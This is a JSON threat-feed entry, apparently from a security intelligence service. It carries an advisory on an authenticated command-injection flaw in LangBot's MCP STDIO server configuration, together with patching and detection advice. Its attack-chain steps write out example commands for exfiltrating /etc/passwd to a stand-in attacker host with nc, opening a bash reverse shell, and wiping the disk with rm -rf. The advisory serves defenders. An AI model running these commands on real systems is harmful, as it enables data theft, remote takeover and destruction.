{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/langbot--4.10.5/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["LangBot (\u003c= 4.10.5)"],"_cs_severities":["high"],"_cs_tags":["rce","command-injection","linux","web-application","supply-chain"],"_cs_type":"advisory","_cs_vendors":["LangBot"],"content_html":"\u003cp\u003eA critical authenticated remote code execution (RCE) vulnerability, tracked as CVE-2026-54449 (CWE-78: OS Command Injection), affects LangBot servers up to and including version 4.10.5. This flaw allows any authenticated user to execute arbitrary commands on the underlying operating system. The vulnerability stems from the \u003ccode\u003eStdioServerParameters\u003c/code\u003e component, imported from Anthropic's \u003ccode\u003emodelcontextprotocol\u003c/code\u003e open source, which directly executes user-supplied commands via a subprocess. An attacker with valid credentials can leverage the \u0026quot;MCP Server Configuration\u0026quot; feature by adding an \u0026quot;STDIO\u0026quot; type MCP with a malicious command. This poses a significant risk to publicly available LangBot instances, enabling full system takeover, data exfiltration, reverse shell establishment, or complete data destruction. The impact extends to local instances, facilitating lateral movement within internal networks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker obtains or uses existing valid credentials to log in and access the LangBot server's web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to the \u0026quot;Extensions\u0026quot; section within the authenticated LangBot interface.\u003c/li\u003e\n\u003cli\u003eThe attacker proceeds to the \u0026quot;MCP\u0026quot; tab and initiates the process to add a new MCP server configuration.\u003c/li\u003e\n\u003cli\u003eThe attacker selects \u0026quot;STDIO\u0026quot; as the server configuration type, which is vulnerable to command injection.\u003c/li\u003e\n\u003cli\u003eThe attacker inputs an arbitrary malicious command into the configuration field, such as \u003ccode\u003ecat /etc/passwd | nc attacker.com 4444\u003c/code\u003e for data exfiltration, \u003ccode\u003ebash -i \u0026gt;\u0026amp; /dev/tcp/10.0.0.1/8080 0\u0026gt;\u0026amp;1\u003c/code\u003e for a reverse shell, or \u003ccode\u003erm -rf / --no-preserve-root\u003c/code\u003e for data destruction.\u003c/li\u003e\n\u003cli\u003eThe LangBot service processes this new MCP configuration, causing the \u003ccode\u003eStdioServerParameters\u003c/code\u003e component to execute the attacker-supplied command on the underlying Linux server.\u003c/li\u003e\n\u003cli\u003eThe malicious command executes with the privileges of the LangBot service user, achieving the attacker's objective, whether it be establishing command and control, exfiltrating sensitive data, or performing destructive actions.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability (CVE-2026-54449) represents a severe authenticated remote code execution risk. Any publicly exposed LangBot instance running versions 4.10.5 or earlier is susceptible to complete compromise if an attacker can gain authenticated access. Successful exploitation allows for full system takeover, leading to the potential for sensitive data exfiltration (e.g., \u003ccode\u003e/etc/passwd\u003c/code\u003e), the establishment of persistent remote access via reverse shells, or even the complete destruction of the machine's data (\u003ccode\u003erm -rf /\u003c/code\u003e). For internal deployments, this RCE can facilitate lateral movement within the network, allowing attackers to pivot to other systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePatch LangBot to a version greater than 4.10.5 immediately to address CVE-2026-54449.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect common command injection patterns and post-exploitation activities, such as reverse shells or data exfiltration attempts.\u003c/li\u003e\n\u003cli\u003eEnable comprehensive process creation logging (e.g., using Sysmon for Linux or auditd) on all servers hosting LangBot to capture the execution of suspicious commands.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-15T17:41:12Z","date_published":"2026-07-15T17:41:12Z","id":"https://feed.craftedsignal.io/briefs/2026-07-langbot-authenticated-rce/","summary":"An authenticated remote code execution vulnerability (CVE-2026-54449) exists in LangBot versions up to and including 4.10.5, allowing any authenticated user to achieve arbitrary command execution by modifying the MCP Server Configuration to include a crafted STDIO MCP command, enabling system takeover, data exfiltration, or reverse shells on affected instances.","title":"Authenticated Remote Code Execution in LangBot via MCP Configuration (CVE-2026-54449)","url":"https://feed.craftedsignal.io/briefs/2026-07-langbot-authenticated-rce/"}],"language":"en","title":"CraftedSignal Threat Feed - LangBot (\u003c= 4.10.5)","version":"https://jsonfeed.org/version/1.1"}